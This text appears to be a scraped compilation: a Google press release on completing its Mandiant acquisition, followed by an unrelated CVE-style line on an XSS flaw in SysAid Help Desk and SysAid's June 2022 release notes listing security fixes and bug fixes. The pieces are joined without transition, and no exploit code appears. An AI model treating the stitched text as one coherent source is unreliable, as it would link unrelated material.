Google and Mandiant share a long commitment to industry-leading security. Over the past two decades, Google has innovated to build some of the most secure computing systems in the world. Google Cloud customers and partners benefit from these pioneering security capabilities, including world-class threat intelligence, zero trust architecture, and planet-scale analytics for security operations. Mandiant, which is known for delivering unparalleled frontline expertise and industry-leading threat intelligence, is a proven first responder to the world's largest cybersecurity incidents. Mandiant's services, delivered by their team of security and intelligence individuals spread across 22 countries, are widely recognized for helping top enterprises and organizations prepare for and react to cybersecurity incidents.

With this acquisition, Google Cloud and Mandiant will deliver an end-to-end security operations suite with even greater capabilities to support customers across their cloud and on-premise environments.

"The completion of this acquisition will enable us to deliver a comprehensive and best-in-class cybersecurity solution," said Thomas Kurian, CEO of Google Cloud. "We believe this acquisition creates incredible value for our customers and the security industry at large. Together, Google Cloud and Mandiant will help reinvent how organizations protect themselves, as well as detect and respond to threats."

Organizations today are facing cybersecurity challenges that have accelerated in frequency, severity and diversity, creating a global security imperative. Enterprises need to be able to detect and respond to malicious actors quickly, with actionable threat intelligence to continually protect their organizations against new attacks.

"Mandiant is driven by a mission to make every organization secure from cyber threats and confident in their readiness," said Kevin Mandia, CEO, Mandiant. "Combining our 18 years of threat intelligence and incident response experience with Google Cloud's security expertise presents an incredible opportunity to deliver with the speed and scale that the security industry needs."

Hear from others on the impact of this acquisition:

*   "The power of stronger partnerships across the cybersecurity ecosystem is critical to driving value for clients and protecting industries around the globe. The combination of Google Cloud and Mandiant and their commitment to multi-cloud will further support increased collaboration, driving innovation across the cybersecurity industry and augmenting threat research capabilities. We look forward to working with them on this mission." — Paolo Dal Cin, Global Lead, Accenture Security
*   "Google's acquisition of Mandiant, a leader in threat intelligence, security advisory, consulting and incident response services will allow Google Cloud to deliver an end-to-end security operations suite with even greater capabilities and services to support customers in their security transformation across cloud and on-premise environments." — Craig Robinson, Research VP, Security Services, IDC
*   "Bringing together Mandiant and Google Cloud, two long-time cybersecurity leaders, will advance how companies identify and defend against threats. We look forward to the impact of this acquisition, both for the security industry and the protection of our customers." — Andy Schworer, Director, Cyber Defense Engineering, Uber

For more information, see the Google Cloud blog and Mandiant blog.

**About Google  
**Google's mission is to organize the world's information and make it universally accessible and useful. Through products and platforms like Search, Maps, Gmail, Android, Google Play, Chrome and YouTube, Google plays a meaningful role in the daily lives of billions of people and has become one of the most widely known companies in the world. Google is a subsidiary of Alphabet Inc.

**About Google Cloud  
**Google Cloud accelerates every organization's ability to digitally transform its business. We deliver enterprise-grade solutions that leverage Google's cutting-edge technology — all on the cleanest cloud in the industry. Customers in more than 200 countries and territories turn to Google Cloud as their trusted partner to enable growth and solve their most critical business problems.

**About Mandiant, Inc.  
**Since 2004, Mandiant has been a trusted partner to security-conscious organizations. Effective security is based on the right combination of expertise, intelligence, and adaptive technology, and the Mandiant Advantage SaaS platform scales decades of frontline experience and industry-leading threat intelligence to deliver a range of dynamic cyber defense solutions. Mandiant's approach helps organizations develop more effective and efficient cyber security programs and instills confidence in their readiness to defend against and respond to cyber threats.

**Forward-Looking Statements  
**This release includes forward-looking statements within the meaning of Section 27A of the Securities Act of 1933 and Section 21E of the Securities Exchange Act of 1934. These forward-looking statements involve certain risks and uncertainties that could cause actual results to differ materially from those indicated in such forward-looking statements, including but not limited to the ability of Google to successfully integrate Mandiant's operations, product lines and technology; the ability of Google to implement its plans, forecasts and other expectations with respect to Mandiant's business after the completion of the transaction and realize additional opportunities for growth and innovation; and the other risks and important factors contained and identified in Alphabet's filings with the Securities and Exchange Commission, any of which could cause actual results to differ materially from the forward-looking statements. The forward-looking statements included in this release are made only as of the date hereof. Google and Alphabet undertake no obligation to update the forward-looking statements to reflect subsequent events or circumstances.

SOURCE: Google Inc.

Google Completes Acquisition of Mandiant

SysAid Help Desk before 22.1.65 allows XSS via the Asset Dashboard, aka FR# 67262.

*   Updated on 28 Jul 2022
*   5 Minutes to read

*   Print
    
*   Share
    
*   Dark
    
    Light
    

**GA June 6, 2022****Feature Requests**

**FR#**

**Description**

**Module/Tool**

52960

Reports generated in Excel are now exported in XLSX format for better experience and support of extra-large files.

Analytics

54161

Improved Patch Management implementation mechanism to resolve Apache HTTPD vulnerability errors. (This also covers FR# 58032.)

Patch Management

52260

Admins can map CI Fields to the Owner Group field when importing CIs into SysAid’s CMDB.

CMDB

64356

Created a new ‘$ReopenSR-requires\_login’ tag for ticket notifications.  
Using this tag will verify that the user who clicked the link is logged in to SysAid and update the SR as needed.

Help Desk

51918

A new check box in the Escalation Rules form allows admins to set reminders on action items.  
Configuration requires using custom user fields and action items dependencies.

Help Desk

53457

Admins can filter columns in the routing rules list by specific values.

Help Desk

60457

We added two new variable tags that can be added to ticket notifications in both the recipient field and the body of the notification:

*   $RequestUserManager – The direct manager of the ticket’s request user.
*   $AIAssigneeDirectManager – The direct manager of the user assigned to the action item.

Help Desk

66409

Improved performance in loading the Self-Service Portal in different sections: Catalogue items, FAQs, new ticket and category display and drop downs.  
This addresses bugs 65724, 60463, and 54442 as well.

Self-Service Portal

53656

Admins can define how many tickets are displayed in the Self-Service Portal scoreboard page when the end-user clicks Show All.

Self-Service Portal

60979

Improved performance around the loading of tickets in the scoreboard for a better customer experience.

Self-Service Portal

66129

Added validation when end-users self-registered for the Self-Service Portal.

Self-Service Portal

67236

Removed capability to import and export knowledge base articles to and from the SysAid Community in preparation for the relaunch of the community.

Knowledge Base

65579

Tightened security around potential XSS vulnerabilities (also covers bug #66542).

Security

65584

Tightened security around changing password capability on the My Settings page.

Security

67238

Removed or restricted access to certain vulnerable files on the SysAid server. This also covers FR #67237

Security

67241

Tightened security against potential XSS (cross-site scripting) attacks in the Password Services module.

Security

67258

Tightened security against potential XSS (cross-site scripting) attacks via the Linked SRs field.

Security

67262

Tightened security against potential XSS (cross-site scripting) attacks in the Asset Dashboard.

Security

66686

Added validation of file types when attachments are uploaded to SysAid. See list of supported file types here.

Security

52825

Admins can now sort the Asset list by the Last Access Time column in ascending or descending order.

Asset Management

64635

Changes were made to the Microsoft Azure interface. We updated the online help for the O365 integration to include the needed configuration changes.

Third-Party Integration

65264

Updated our documentation for setting up the OneLogin SSO integration in response to changes in OneLogin’s requirements.

Third-Party Integration

61365

Tightened security around access to LDAP Imported users via the API. This covers CVE-2021-36721.

Security

66686 (\*)

Added validation of file types when attachments are uploaded to SysAid. See list of supported file types here. This covers CVE-2021-22796.

Security

66692

Tightened security around access for non-admin users. This covers CVE-2022-22798.

Security

67656

Tightened security against potential Cross-Site Scripting (XSS) attacks. This covers CVE-2022-23165. This also covers FR #5209.

Security

67655

Tightened security around access to vulnerable files in the SysAid server.  
This covers CVE-2022-23166.

Security

66687

Resolved vulnerabilities related to Apache Tomcat.

Security

**Bug Fixes**

**Bug #**

**Description**

**Module/Tool**

61655

Fixed a bug that caused an empty list page to open when admins clicked on the Highest Values graph in the Dashboard.

Analytics

64779

Fixed a bug that caused SysAid to create duplicate asset records when the asset ID generated by the SysAid agent consisted of only one digit.

Asset Management

57188

Fixed a bug that prevented SysAid from displaying changes to an admin’s Company, Location, and Department fields on an asset that was automatically assigned to that admin.

Asset Management

66131

Fixed a bug that generated errors when an admin attempted to import Chromebook devices that were missing an Auto-update expiration date.

Asset Management

64125

Fixed a bug that caused a timeout when admins tried exporting the list of assets that were using a software product.

Asset Management

52731

Fixed a bug that prevented SysAid from properly displaying graphs in the dashboard when the dashboard headers contained certain special characters.

Dashboard

65798

Fixed a bug that sometimes caused timeouts when SysAid was loading the email rules page.

Email Integration

66132

Fixed a bug that caused SysAid to ignore certain user parameters in routing rules on tickets generated via email, when email integration was configured with OAuth 2.0 protocol.

Email Integration

65798

Fixed a bug that sometimes caused timeouts when SysAid was loading the email rules page.

Email Integration

65211

Fixed a bug that sometimes prevented admins from changing the order of routing rules.

Help Desk

65409

Fixed a bug that caused escalation rules to run outside of the defined operating hours.

Help Desk

66388

Fixed a bug that sometimes prevented users from logging in to the Mobile solution after they had logged out.

Mobile

65757

Fixed a bug that prevented the Self-Service Portal from displaying the profile menu when it was opened via the hotkey.

Self Service Portal

64572

Fixed a bug that caused the agent hotkey to open the now deprecated End-User Portal when the Self-Service Portal was disabled in that account.

Self Service Portal

65199

Fixed a bug that prevented end users from automatically downloading the ticket attachment after login to the Self-Service Portal, when they click on the ‘${LinkToAttachments}’ tag in a ticket email notification.

Self Service Portal

65353

Fixed a bug that sometimes caused content generated by category pointers from appearing in the service catalog.

Self Service Portal

65363

Fixed a bug that sometimes generated an error when admins tried to populate data in a workflow template with many action items.

Service Desk

63121

Fixed a bug that prevented the Self-Service Portal’s Scoreboard from displaying any items in the full Workflow Actions list when one of the workflow actions on the list had been deleted from its template.

Service Desk

64086

Fixed a bug that prevented SysAid from sending emails with attachments larger than 3MB when email integration was configured for O365 using the Oauth 2.0 protocol.

Third-Party Integration

66123

Fixed a bug that caused the ‘Can be assigned to service record’ setting to be reverted to its default for Azure-imported user groups when SysAid synced with Azure.

Third-Party Integration

66620

Fixed a bug that prevented Azure-imported admins from seeing tickets assigned to their group.

Third-Party Integration

65590

Added the capability to remove configurations in the Multi SSO Connector setup page, along with other minor UI updates.

Third-Party Integration

65802

Fixed a bug that prevented admins from changing the HTML displayed in their login screen for the SSO Connector add-on.

Third-Party Integration

57227

Fixed a bug that caused users who were demoted from admin to end user to maintain some of their original admin permissions.

User Management

Was this article helpful?

Tag

#chrome